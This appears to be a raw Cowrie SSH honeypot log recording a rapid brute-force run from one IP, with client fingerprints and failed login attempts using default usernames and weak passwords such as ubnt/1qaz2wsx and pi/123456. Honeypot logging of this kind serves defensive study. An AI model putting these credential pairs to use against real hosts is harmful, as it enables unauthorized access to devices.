{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.415273Z","src_ip":"87.120.191.13","session":"50e4aeed8293"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1qaz2wsx","message":"login attempt [ubnt/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.495957Z","src_ip":"87.120.191.13","session":"50e4aeed8293"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.497056Z","src_ip":"87.120.191.13","session":"1411af11fd0e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49356,"dst_ip":"1.2.3.4","dst_port":22,"session":"36fe30f0a51d","protocol":"ssh","message":"New connection: 87.120.191.13:49356 (1.2.3.4:22) [session: 36fe30f0a51d]","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.516272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.517285Z","src_ip":"87.120.191.13","session":"36fe30f0a51d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.537297Z","src_ip":"87.120.191.13","session":"36fe30f0a51d"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1qaz2wsx","message":"login attempt [ftpuser/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.601221Z","src_ip":"87.120.191.13","session":"36fe30f0a51d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.625250Z","src_ip":"87.120.191.13","session":"70aabbd7319c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.932167Z","src_ip":"87.120.191.13","session":"9990100cd6a8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49372,"dst_ip":"1.2.3.4","dst_port":22,"session":"68faebc8ad61","protocol":"ssh","message":"New connection: 87.120.191.13:49372 (1.2.3.4:22) [session: 68faebc8ad61]","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.954406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.955286Z","src_ip":"87.120.191.13","session":"68faebc8ad61"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.981695Z","src_ip":"87.120.191.13","session":"68faebc8ad61"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1qaz2wsx","message":"login attempt [pi/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.109832Z","src_ip":"87.120.191.13","session":"68faebc8ad61"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.551191Z","src_ip":"87.120.191.13","session":"50e4aeed8293"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49396,"dst_ip":"1.2.3.4","dst_port":22,"session":"7998d1e21ce4","protocol":"ssh","message":"New connection: 87.120.191.13:49396 (1.2.3.4:22) [session: 7998d1e21ce4]","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.579238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.610117Z","src_ip":"87.120.191.13","session":"7998d1e21ce4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.610645Z","src_ip":"87.120.191.13","session":"7998d1e21ce4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.658468Z","src_ip":"87.120.191.13","session":"36fe30f0a51d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49370,"dst_ip":"1.2.3.4","dst_port":22,"session":"cba8c3d5a7e3","protocol":"ssh","message":"New connection: 87.120.191.13:49370 (1.2.3.4:22) [session: cba8c3d5a7e3]","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.661907Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49404,"dst_ip":"1.2.3.4","dst_port":22,"session":"35171a9a9a5f","protocol":"ssh","message":"New connection: 87.120.191.13:49404 (1.2.3.4:22) [session: 35171a9a9a5f]","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.687665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.705954Z","src_ip":"87.120.191.13","session":"cba8c3d5a7e3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.706558Z","src_ip":"87.120.191.13","session":"cba8c3d5a7e3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.724659Z","src_ip":"87.120.191.13","session":"35171a9a9a5f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.725245Z","src_ip":"87.120.191.13","session":"35171a9a9a5f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"123456789","message":"login attempt [ubnt/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.880119Z","src_ip":"87.120.191.13","session":"7998d1e21ce4"}
{"eventid":"cowrie.login.failed","username":"noc","password":"1qaz2wsx","message":"login attempt [noc/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.951682Z","src_ip":"87.120.191.13","session":"cba8c3d5a7e3"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456789","message":"login attempt [ftpuser/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:00.984337Z","src_ip":"87.120.191.13","session":"35171a9a9a5f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:01.177961Z","src_ip":"87.120.191.13","session":"68faebc8ad61"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49410,"dst_ip":"1.2.3.4","dst_port":22,"session":"55506e0f9f1f","protocol":"ssh","message":"New connection: 87.120.191.13:49410 (1.2.3.4:22) [session: 55506e0f9f1f]","sensor":"my-vps","timestamp":"2025-08-26T13:59:01.197179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:01.257566Z","src_ip":"87.120.191.13","session":"55506e0f9f1f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:01.259243Z","src_ip":"87.120.191.13","session":"55506e0f9f1f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456789","message":"login attempt [pi/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:01.504849Z","src_ip":"87.120.191.13","session":"55506e0f9f1f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:01.996688Z","src_ip":"87.120.191.13","session":"7998d1e21ce4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49442,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bc0736d399a","protocol":"ssh","message":"New connection: 87.120.191.13:49442 (1.2.3.4:22) [session: 4bc0736d399a]","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.023005Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.073436Z","src_ip":"87.120.191.13","session":"cba8c3d5a7e3"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.088642Z","src_ip":"87.120.191.13","session":"35171a9a9a5f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49454,"dst_ip":"1.2.3.4","dst_port":22,"session":"983b9fdada8c","protocol":"ssh","message":"New connection: 87.120.191.13:49454 (1.2.3.4:22) [session: 983b9fdada8c]","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.107055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.118406Z","src_ip":"87.120.191.13","session":"4bc0736d399a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.119265Z","src_ip":"87.120.191.13","session":"4bc0736d399a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49456,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd2421ecae28","protocol":"ssh","message":"New connection: 87.120.191.13:49456 (1.2.3.4:22) [session: bd2421ecae28]","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.137304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.180266Z","src_ip":"87.120.191.13","session":"983b9fdada8c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.181030Z","src_ip":"87.120.191.13","session":"983b9fdada8c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.216605Z","src_ip":"87.120.191.13","session":"bd2421ecae28"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.217553Z","src_ip":"87.120.191.13","session":"bd2421ecae28"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"123456","message":"login attempt [ubnt/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.507226Z","src_ip":"87.120.191.13","session":"4bc0736d399a"}
{"eventid":"cowrie.login.failed","username":"noc","password":"123456789","message":"login attempt [noc/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.537071Z","src_ip":"87.120.191.13","session":"983b9fdada8c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.542965Z","src_ip":"87.120.191.13","session":"bd2421ecae28"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:02.573020Z","src_ip":"87.120.191.13","session":"55506e0f9f1f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.572948Z","src_ip":"87.120.191.13","session":"4bc0736d399a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.598786Z","src_ip":"87.120.191.13","session":"983b9fdada8c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.602825Z","src_ip":"87.120.191.13","session":"bd2421ecae28"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57722,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb9f185b8ffb","protocol":"ssh","message":"New connection: 87.120.191.13:57722 (1.2.3.4:22) [session: bb9f185b8ffb]","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.629115Z"}
